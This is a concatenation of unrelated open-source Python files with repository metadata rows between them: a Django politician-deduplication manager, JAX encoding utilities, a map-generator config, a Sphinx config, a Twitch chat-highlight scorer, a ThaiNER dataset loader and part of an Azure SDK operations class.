if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT3 "
return 0
def retrieve_politicians_are_not_duplicates_list(self, politician_we_vote_id, read_only=True):
"""
Get a list of other politician_we_vote_id's that are not duplicates
:param politician_we_vote_id:
:param read_only:
:return:
"""
# Note that the direction of the linkage does not matter
politicians_are_not_duplicates_list1 = []
politicians_are_not_duplicates_list2 = []
status = ""
try:
if positive_value_exists(read_only):
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.using('readonly').filter(
politician1_we_vote_id__iexact=politician_we_vote_id,
)
else:
politicians_are_not_duplicates_list_query = PoliticiansAreNotDuplicates.objects.filter(
politician1_we_vote_id__iexact=politician_we_vote_id,
)
politicians_are_not_duplicates_list1 = list(politicians_are_not_duplicates_list_query)
success = True
status += "POLITICIANS_NOT_DUPLICATES_LIST_UPDATED_OR_CREATED1 "
except PoliticiansAreNotDuplicates.DoesNotExist:
# No data found. Try again below
success = True
status += 'NO_POLITICIANS_NOT_DUPLICATES_LIST_RETRIEVED_DoesNotExist1 '
except Exception as e:
success = False
status += "POLITICIANS_NOT_DUPLICATES_LIST_NOT_UPDATED_OR_CREATED1: " + str(e) + ' '
if success:
try:
if positive_value_exists(read_only):
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.using('readonly').filter(
politician2_we_vote_id__iexact=politician_we_vote_id,
)
else:
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.filter(
politician2_we_vote_id__iexact=politician_we_vote_id,
)
politicians_are_not_duplicates_list2 = list(politicians_are_not_duplicates_list_query)
success = True
status += "POLITICIANS_NOT_DUPLICATES_LIST_UPDATED_OR_CREATED2 "
except PoliticiansAreNotDuplicates.DoesNotExist:
success = True
status += 'NO_POLITICIANS_NOT_DUPLICATES_LIST_RETRIEVED2_DoesNotExist2 '
except Exception as e:
success = False
status += "POLITICIANS_NOT_DUPLICATES_LIST_NOT_UPDATED_OR_CREATED2: " + str(e) + ' '
politicians_are_not_duplicates_list = \
politicians_are_not_duplicates_list1 + politicians_are_not_duplicates_list2
politicians_are_not_duplicates_list_found = positive_value_exists(len(politicians_are_not_duplicates_list))
politicians_are_not_duplicates_list_we_vote_ids = []
for one_entry in politicians_are_not_duplicates_list:
if one_entry.politician1_we_vote_id != politician_we_vote_id:
politicians_are_not_duplicates_list_we_vote_ids.append(one_entry.politician1_we_vote_id)
elif one_entry.politician2_we_vote_id != politician_we_vote_id:
politicians_are_not_duplicates_list_we_vote_ids.append(one_entry.politician2_we_vote_id)
results = {
'success': success,
'status': status,
'politicians_are_not_duplicates_list_found': politicians_are_not_duplicates_list_found,
'politicians_are_not_duplicates_list': politicians_are_not_duplicates_list,
'politicians_are_not_duplicates_list_we_vote_ids': politicians_are_not_duplicates_list_we_vote_ids,
}
return results
def retrieve_politicians_with_misformatted_names(self, start=0, count=15):
"""
Get the first 15 records that have 3 capitalized letters in a row, as long as those letters
are not 'III' i.e. King Henry III. Also exclude the names where the word "WITHDRAWN" has been appended when
the politician withdrew from the race
SELECT * FROM public.politician_politician WHERE politician_name ~ '.*?[A-Z][A-Z][A-Z].*?' and
politician_name !~ '.*?III.*?'
:param start:
:return:
"""
politician_query = Politician.objects.all()
# Get all politicians that have three capital letters in a row in their name, but exclude III (King Henry III)
politician_query = politician_query.filter(politician_name__regex=r'.*?[A-Z][A-Z][A-Z].*?(?<!III)').\
order_by('politician_name')
number_of_rows = politician_query.count()
politician_query = politician_query[start:(start+count)]
politician_list_objects = list(politician_query)
results_list = []
# out = ''
# out = 'KING HENRY III => ' + display_full_name_with_correct_capitalization('KING HENRY III') + ", "
for x in politician_list_objects:
name = x.politician_name
if name.endswith('WITHDRAWN') and not bool(re.match('^[A-Z]+$', name)):
continue
x.person_name_normalized = display_full_name_with_correct_capitalization(name)
x.party = x.political_party
results_list.append(x)
# out += name + ' = > ' + x.person_name_normalized + ', '
return results_list, number_of_rows
def update_or_create_politicians_are_not_duplicates(self, politician1_we_vote_id, politician2_we_vote_id):
"""
Either update or create a politician entry.
"""
exception_multiple_object_returned = False
success = False
new_politicians_are_not_duplicates_created = False
politicians_are_not_duplicates = None
status = ""
if positive_value_exists(politician1_we_vote_id) and positive_value_exists(politician2_we_vote_id):
try:
updated_values = {
'politician1_we_vote_id': politician1_we_vote_id,
'politician2_we_vote_id': politician2_we_vote_id,
}
politicians_are_not_duplicates, new_politicians_are_not_duplicates_created = \
PoliticiansAreNotDuplicates.objects.update_or_create(
politician1_we_vote_id__exact=politician1_we_vote_id,
politician2_we_vote_id__iexact=politician2_we_vote_id,
defaults=updated_values)
success = True
status += "POLITICIANS_ARE_NOT_DUPLICATES_UPDATED_OR_CREATED "
except PoliticiansAreNotDuplicates.MultipleObjectsReturned as e:
success = False
status += 'MULTIPLE_MATCHING_POLITICIANS_ARE_NOT_DUPLICATES_FOUND_BY_POLITICIAN_WE_VOTE_ID '
exception_multiple_object_returned = True
except Exception as e:
status += 'EXCEPTION_UPDATE_OR_CREATE_POLITICIANS_ARE_NOT_DUPLICATES ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_politicians_are_not_duplicates_created': new_politicians_are_not_duplicates_created,
'politicians_are_not_duplicates': politicians_are_not_duplicates,
}
return results
class PoliticianTagLink(models.Model):
"""
A confirmed (undisputed) link between tag & item of interest.
"""
tag = models.ForeignKey(Tag, null=False, blank=False, verbose_name='tag unique identifier',
on_delete=models.deletion.DO_NOTHING)
politician = models.ForeignKey(Politician, null=False, blank=False, verbose_name='politician unique identifier',
on_delete=models.deletion.DO_NOTHING)
# measure_id
# office_id
# issue_id
class PoliticianTagLinkDisputed(models.Model):
"""
This is a highly disputed link between tag & item of interest. Generated from 'tag_added', and tag results
are only shown to people within the cloud of the voter who posted
We split off how things are tagged to avoid conflict wars between liberals & conservatives
(Deal with some tags visible in some networks, and not in others - ex/ #ObamaSucks)
"""
tag = models.ForeignKey(Tag, null=False, blank=False, verbose_name='tag unique identifier',
on_delete=models.deletion.DO_NOTHING)
politician = models.ForeignKey(Politician, null=False, blank=False, verbose_name='politician unique identifier',
on_delete=models.deletion.DO_NOTHING)
# measure_id
# office_id
# issue_id
| 49.17791 | 120 | 0.618034 |
df44ca74a12f43bd9e431c0a1504b13ff7879808 | 5,377 | py | Python | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | 3 | 2022-03-08T18:19:32.000Z | 2022-03-14T19:58:01.000Z | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | 10 | 2022-03-01T12:03:01.000Z | 2022-03-10T08:47:21.000Z | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2020 Joss Whittle
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import jax
import jax.numpy as jnp
@jax.jit
def encode_values_raw(pred, gt):
return jnp.int32(gt) - jnp.int32(pred)
@jax.jit
def decode_values_raw(pred, encoded):
return jnp.int32(pred) + jnp.int32(encoded)
@jax.jit
def encode_values_uint8(pred, gt):
return jnp.uint8(((jnp.int32(gt) - jnp.int32(pred)) + 256) % 256)
@jax.jit
def decode_values_uint8(pred, encoded):
return jnp.uint8(((jnp.int32(pred) + jnp.int32(encoded)) + 256) % 256)
@jax.jit
def encode_values_uint16(pred, gt):
return jnp.uint16(((jnp.int32(gt) - jnp.int32(pred)) + 65536) % 65536)
@jax.jit
def decode_values_uint16(pred, encoded):
return jnp.uint16(((jnp.int32(pred) + jnp.int32(encoded)) + 65536) % 65536)
@jax.jit
def encode_categorical(pred, gt):
# Output shape and dtype determined from reference values
shape = gt.shape
dtype = gt.dtype
# Determine the descending order indexing for the logits at each spatial location and channel
logit_ranks = jnp.argsort(pred).astype(dtype)[..., ::-1]
# Flatten logit ranks from [B, ...SPATIAL..., C, L] to [-1, L]
flat_logit_ranks = jnp.reshape(logit_ranks, (-1, logit_ranks.shape[-1]))
# Flatten gt from [B, ...SPATIAL..., C] to [-1,]
flat_gt = jnp.reshape(gt, (-1,))
# Perform argwhere for a single location and channel
def argwhere(logit_ranks, gt):
return jnp.argmax(logit_ranks == gt).astype(dtype)
# Distribute the argwhere over all spatial locations and channels
flat_encoded = jax.vmap(argwhere)(flat_logit_ranks, flat_gt)
# Reshape the encoded values back into the shape of the gt tensor
encoded = jnp.reshape(flat_encoded, shape)
return encoded
@jax.jit
def decode_categorical(pred, encoded):
# Output shape and dtype determined from encoded values
shape = encoded.shape
dtype = encoded.dtype
# Determine the descending order indexing for the logits at each spatial location and channel
logit_ranks = jnp.argsort(pred).astype(dtype)[..., ::-1]
# Flatten logit ranks from [B, ...SPATIAL..., C, L] to [-1, L]
flat_logit_ranks = jnp.reshape(logit_ranks, (-1, logit_ranks.shape[-1]))
# Flatten encoded from [B, ...SPATIAL..., C] to [-1,]
flat_encoded = jnp.reshape(encoded, (-1,))
# Perform indexing for a single location and channel
def index(logit_ranks, encoded):
return logit_ranks[encoded]
# Distribute the indexing over all spatial locations and channels
flat_decoded = jax.vmap(index)(flat_logit_ranks, flat_encoded)
# Reshape the decoded values back into the shape of the encoded tensor
decoded = jnp.reshape(flat_decoded, shape)
return decoded
def yield_chunks(max_value, chunk):
# Assert max value is positive
assert max_value > 0
# Assert chunk size is valid
assert chunk > 3
if chunk >= max_value:
# If we can process in a single chunk than yield that chunk with no padding
yield (0, max_value), (0, 0)
else:
# Yield a set of constant sized chunks along one axis including boundary conditions
for idx in range(0, max_value, (chunk-3)):
# Far edge of chunk, clamped against the right edge
i1 = min(max_value, (idx+(chunk-2)))
# Does this chunk border on the rightmost edge
last = (i1 == max_value)
# Near edge of chunk, constraining that every chunk must be of constant size
i0 = max(0, ((i1-(chunk-2)) if last else idx))
# Does this chunk border on the left most edge
first = (i0 == 0)
# Calculate constant width padding
p0 = 0 if first else (2 if last else 1)
p1 = 0 if last else (2 if first else 1)
# Assert singleton chunk was handled by the other if-branch
assert not (first and last)
# Assert that the total padding was length 2 to ensure constant sized chunks
assert (p0 + p1) == 2
# Yield the chunk and the dynamic padding
yield (i0, i1), (p0, p1)
# Prevent duplicating last chunk
if last:
break
def validate_padding(padding):
# Assert valid padding
assert isinstance(padding, int)
assert padding >= 0
| 33.191358 | 97 | 0.677329 |
26f660801033e59ea249419f22c5edbb0c4c38af | 1,089 | py | Python | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | SEED = 12345
MAP_SIZE = 10000
# GRAPH
GRAPH_MAX_POINTS = 7500
GRAPH_RELAXATIONS = 2
POINT_RADIUS = 15
# GEO
STARTING_LAND = True
STARTING_LAND_SIZE = 5000
STARTING_LAND_POS = (5000, 5000)
LAND_PERLIN_WEIGHT = 1.25
LAND_RADIAL_WEIGHT = 1.1
LAND_THRESHOLD = 1.0
LAND_CORNER_FACTOR = 0.3
ELEVATION_OCEAN_WEIGHT = .8
ELEVATION_PERLIN_WEIGHT = 1.25
RANDOM_LAKE_FACTOR = 0.03
LAND_MASS_CULL_SIZE = 15
DRAW_CORNERS = False
DRAW_REGION_OUTLINE = True
REGION_OUTLINE_WIDTH = 10
DRAW_ELEVATION_ON_REGIONS = False
DRAW_DISTANCE_FROM_OCEAN_REGIONS = False
DRAW_DISTANCE_FROM_WATER_REGIONS = False
DRAW_DISTANCE_FROM_OCEAN_CORNERS = False
DRAW_DISTANCE_FROM_WATER_CORNERS = False
DRAW_REGIONS_NORMAL = False
DRAW_REGIONS_ELEVATION = False
DRAW_REGIONS_ELEVATION_COLORED = True
DRAW_REGIONS_OCEAN_DISTANCE = False
DRAW_REGIONS_WATER_DISTANCE = False
# GUI
SCREEN_WIDTH = 1000
SCREEN_HEIGHT = 800
BUTTON_BUFFER = 10
BUTTON_WIDTH = 200
BUTTON_HEIGHT = 50
BUTTON_FONT = 'ariel'
BUTTON_FONT_SIZE = 20
BUTTON_RESET_TIME = 0.1
VIEWPORT_MOVING_SPEED = 200
VIEWPORT_MAX_ZOOM = 8
VIEWPORT_SIZE = 800
| 19.446429 | 40 | 0.820937 |
92ee5e105ea9af6be4a292a45249b97048120dc5 | 1,897 | py | Python | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | 2 | 2020-01-16T18:30:55.000Z | 2020-02-06T08:33:51.000Z | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | null | null | null | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'htdeblur'
copyright = '2019, Zack Phillips, Sarah Dean'
author = 'Zack Phillips, Sarah Dean'
# The full version, including alpha/beta/rc tags
release = '0.1'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 33.875 | 79 | 0.662098 |
9ec2f14cced1cf5706237f64ceb1ff2113a1cb13 | 96 | py | Python | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def foo():
raise <error descr="Raising a string exception">"String"<caret> "String1"</error> | 48 | 85 | 0.697917 |
9bfd39ce71554b31a0fe7709ed3aa2499d8b8a01 | 6,041 | py | Python | upload/chatAnalyze.py | zinuzian-portfolio/LAJI | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 2 | 2019-07-24T09:29:24.000Z | 2021-01-16T13:13:52.000Z | upload/chatAnalyze.py | zinuzian-portfolio/LAJI | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 21 | 2019-08-28T09:20:34.000Z | 2022-02-10T10:13:37.000Z | upload/chatAnalyze.py | zinuzian-portfolio/HighlightU | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 1 | 2021-06-14T20:21:59.000Z | 2021-06-14T20:21:59.000Z | from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from collections import Counter, OrderedDict
from .repeatReplacer import RepeatReplacer
# from sklearn.preprocessing import normalize
import operator
import re
'''
1. Load chatlog and words for scoring
2. Do preprocessing by reading one line at one time
3. Store the each result of sentences to a dictionary {time - preprocessed words} in a list
4. Review the list that contains a set of dictionary to score them with labeledwords
5. Store the each result of sentences to a dictionary {time - normalized_score} in a list
6. Return the list when it is called to be executed.
'''
# How to Use
'''
labeldwords = ['a set of lists of words']
f = open("test.txt", 'rt', encoding='UTF8')
chatanlyze = ChatAnalyze(f, labeldwords)
score = chatanlyze.Preprocessing()
result = chatanlyze.Scoring(score)
sectined_result = ca.Sectioned_Scoring(result, 5)
cand = chatanlyze.makeCandidateList(histogram=sectined_result,
numOfMaximumHighlight=10,
delay=1000,
videoLen=19000)
'''
class ChatAnalyze:
# chatlog <== file = open("test.txt", 'rt', encoding='UTF8')
# labeledwords <== list
# table_time = list()
# table_data = list()
# Final_Result = dict()
def __init__(self, chatlog, labeledwords):
# server setting
import nltk
nltk.download('stopwords')
nltk.download('punkt')
nltk.download('wordnet')
self.chatlog = chatlog
self.labeledwords = labeledwords
self.table_time = list()
self.table_data = list()
self.Final_Result = dict()
self.Sectioned_Result = dict()
def Preprocessing(self):
# Line by Line seperating
while True:
line = self.chatlog.readline().lower()
if not line:
break
timeline, data = line.split(" ", maxsplit=1)
self.table_time.append(timeline)
self.table_data.append(data)
score = [0]*len(self.table_time)
return score
def Scoring(self, score):
ps = PorterStemmer()
iteration = 0
# Stopwords and Replacer
stopWords = set(stopwords.words('english'))
replacer = RepeatReplacer()
# Append most common top 10 Term freqency to labeled words
filtered_sentence = []
for eachData in self.table_data:
words = word_tokenize(eachData)
output = []
for check in words:
# repeat word delete
check = replacer.replace(check)
check = re.sub(r'[^\w]', '', check)
output.append(check)
for w in output:
if w not in stopWords and not w.isdigit():
filtered_sentence.append(w)
# Delete "" [Exception Handling]
counts = Counter(filtered_sentence)
del counts[""]
# Sort by counts.value ( most freqent words )
counts = OrderedDict(counts.most_common())
i = 0
# Check if the most freqent word is in labelwords
# if yes, skip and check next one
# if no, append it
while iteration < 20:
if list(counts.keys())[i] not in self.labeledwords:
self.labeledwords.append(list(counts.keys())[i])
i += 1
iteration += 1
else:
i += 1
print("[Label words]")
print(self.labeledwords, end="\n")
# Scoring
for eachData in self.table_data:
words = word_tokenize(eachData)
target_score = 0
for word in words:
if(ps.stem(word) in self.labeledwords):
target_score += 1
score[self.table_data.index(eachData)] = target_score
# Result
result = sorted(Counter(self.table_time).items())
index = 0
for eachResult in result:
# How many times chats appeared in same time
iteration = eachResult[1]
sum = 0
for i in range(iteration):
sum += score[i+index]
self.Final_Result[eachResult[0]] = sum
index += iteration
return self.Final_Result
# finalresult = dict(), section = int (how many sector you want in timeline)
def Sectioned_Scoring(self, finalresult, section):
result = list()
# Finalresult (dict) to result (list)
for key, value in finalresult.items():
temp = [key, value]
result.append(temp)
for eachResult in result:
sum = 0
# Check if section is over or not.
if (result.index(eachResult) + section) <= len(result):
startindex = result.index(eachResult)
sumList = result[startindex: startindex + section]
for eachsumList in sumList:
sum += eachsumList[1]
self.Sectioned_Result[eachResult[0]] = sum
else:
return normalizing(self.Sectioned_Result)
def normalizing(Sectioned_Result):
# Normalization
max_sum = max(Sectioned_Result.items(),
key=operator.itemgetter(1))[1]
for key, value in Sectioned_Result.items():
Sectioned_Result[key] = value / max_sum
return Sectioned_Result
# How to use this class
if __name__ == '__main__':
labeldwords = ['pog', 'poggers', 'pogchamp', 'holy', 'shit', 'wow', 'ez', 'clip', 'nice',
'omg', 'wut', 'gee', 'god', 'dirty', 'way', 'moly', 'wtf', 'fuck', 'crazy', 'omfg']
f = open("test.txt", 'rt', encoding='UTF8')
chatanlyze = ChatAnalyze(f, labeldwords)
score = chatanlyze.Preprocessing()
result = chatanlyze.Scoring(score)
sectined_result = chatanlyze.Sectioned_Scoring(result, 5)
# print(cand)
| 31.139175 | 102 | 0.583182 |
29922d970f25d34c203abc65b655df1f369694a6 | 687 | py | Python | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/CodingPractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | 11 | 2019-09-01T22:36:00.000Z | 2021-11-08T08:57:20.000Z | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/LeetCodePractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | null | null | null | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/LeetCodePractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | 2 | 2020-05-27T14:58:52.000Z | 2020-05-27T15:04:17.000Z | # Given a positive integer, return its corresponding column title as appear in an Excel sheet.
# For example:
# 1 -> A
# 2 -> B
# 3 -> C
# ...
# 26 -> Z
# 27 -> AA
# 28 -> AB
# ...
# Example 1:
# Input: 1
# Output: "A"
# Example 2:
# Input: 28
# Output: "AB"
# Example 3:
# Input: 701
# Output: "ZY"
class Solution(object):
def convertToTitle(self, n):
"""
:type n: int
:rtype: str
"""
# 模拟 O(lgn) O(1)
capitals = [chr(x) for x in range(ord('A'), ord('Z')+1)]
res = []
while n>0:
res.append(capitals[(n-1)%26])
n = (n-1)//26
return ''.join(res[::-1]) | 19.083333 | 94 | 0.462882 |
ed54647747e9d405ccb57e0d1c98fa497abe942b | 5,066 | py | Python | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | 7 | 2021-01-04T22:18:26.000Z | 2021-07-10T09:13:29.000Z | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | null | null | null | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | 3 | 2021-01-03T22:08:20.000Z | 2021-08-12T20:09:39.000Z | from __future__ import absolute_import, division, print_function
import datasets
_CITATION = """\
@misc{Wannaphong Phatthiyaphaibun_2019,
title={wannaphongcom/thai-ner: ThaiNER 1.3},
url={https://zenodo.org/record/3550546},
DOI={10.5281/ZENODO.3550546},
abstractNote={Thai Named Entity Recognition},
publisher={Zenodo},
author={Wannaphong Phatthiyaphaibun},
year={2019},
month={Nov}
}
"""
_LICENSE = "CC-BY 3.0"
_DESCRIPTION = """\
ThaiNER (v1.3) is a 6,456-sentence named entity recognition dataset created from expanding the 2,258-sentence
[unnamed dataset](http://pioneer.chula.ac.th/~awirote/Data-Nutcha.zip) by
[Tirasaroj and Aroonmanakun (2012)](http://pioneer.chula.ac.th/~awirote/publications/).
It is used to train NER taggers in [PyThaiNLP](https://github.com/PyThaiNLP/pythainlp).
The NER tags are annotated by [Tirasaroj and Aroonmanakun (2012)]((http://pioneer.chula.ac.th/~awirote/publications/))
for 2,258 sentences and the rest by [@wannaphong](https://github.com/wannaphong/).
The POS tags are done by [PyThaiNLP](https://github.com/PyThaiNLP/pythainlp)'s `perceptron` engine trained on `orchid_ud`.
[@wannaphong](https://github.com/wannaphong/) is now the only maintainer of this dataset.
"""
class ThaiNerConfig(datasets.BuilderConfig):
"""BuilderConfig for ThaiNer."""
def __init__(self, **kwargs):
"""BuilderConfig for ThaiNer.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(ThaiNerConfig, self).__init__(**kwargs)
class Thainer(datasets.GeneratorBasedBuilder):
_DOWNLOAD_URL = "https://github.com/wannaphong/thai-ner/raw/master/model/1.3/data-pos.conll"
_SENTENCE_SPLITTERS = ["", " ", "\n"]
_POS_TAGS = [
"ADJ",
"ADP",
"ADV",
"AUX",
"CCONJ",
"DET",
"NOUN",
"NUM",
"PART",
"PRON",
"PROPN",
"PUNCT",
"SCONJ",
"VERB",
]
_NER_TAGS = [
"B-DATE",
"B-EMAIL",
"B-LAW",
"B-LEN",
"B-LOCATION",
"B-MONEY",
"B-ORGANIZATION",
"B-PERCENT",
"B-PERSON",
"B-PHONE",
"B-TIME",
"B-URL",
"B-ZIP",
"B-ไม่ยืนยัน",
"I-DATE",
"I-EMAIL",
"I-LAW",
"I-LEN",
"I-LOCATION",
"I-MONEY",
"I-ORGANIZATION",
"I-PERCENT",
"I-PERSON",
"I-PHONE",
"I-TIME",
"I-URL",
"I-ไม่ยืนยัน",
"O",
]
BUILDER_CONFIGS = [
ThaiNerConfig(
name="thainer",
version=datasets.Version("1.3.0"),
description="Thai Named Entity Recognition for PyThaiNLP (6,456 sentences)",
),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("int32"),
"tokens": datasets.Sequence(datasets.Value("string")),
"pos_tags": datasets.Sequence(datasets.features.ClassLabel(names=self._POS_TAGS)),
"ner_tags": datasets.Sequence(datasets.features.ClassLabel(names=self._NER_TAGS)),
}
),
supervised_keys=None,
homepage="https://github.com/wannaphong/thai-ner/",
citation=_CITATION,
license=_LICENSE,
)
def _split_generators(self, dl_manager):
data_path = dl_manager.download_and_extract(self._DOWNLOAD_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"filepath": data_path},
),
]
def _generate_examples(self, filepath):
with open(filepath, encoding="utf-8") as f:
guid = 0
tokens = []
pos_tags = []
ner_tags = []
for line in f:
if line in self._SENTENCE_SPLITTERS:
if tokens:
yield guid, {
"id": str(guid),
"tokens": tokens,
"pos_tags": pos_tags,
"ner_tags": ner_tags,
}
guid += 1
tokens = []
pos_tags = []
ner_tags = []
else:
# thainer tokens are tab separated
splits = line.split("\t")
# replace junk ner tags
ner_tag = splits[2] if splits[2] in self._NER_TAGS else "O"
tokens.append(splits[0])
pos_tags.append(splits[1])
ner_tags.append(ner_tag.rstrip())
# last example
yield guid, {
"id": str(guid),
"tokens": tokens,
"pos_tags": pos_tags,
"ner_tags": ner_tags,
}
| 30.70303 | 122 | 0.51895 |
b2d4ee18d6d8a99e3d59be8485067461766467be | 22,419 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations(object):
"""InterfaceEndpointsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
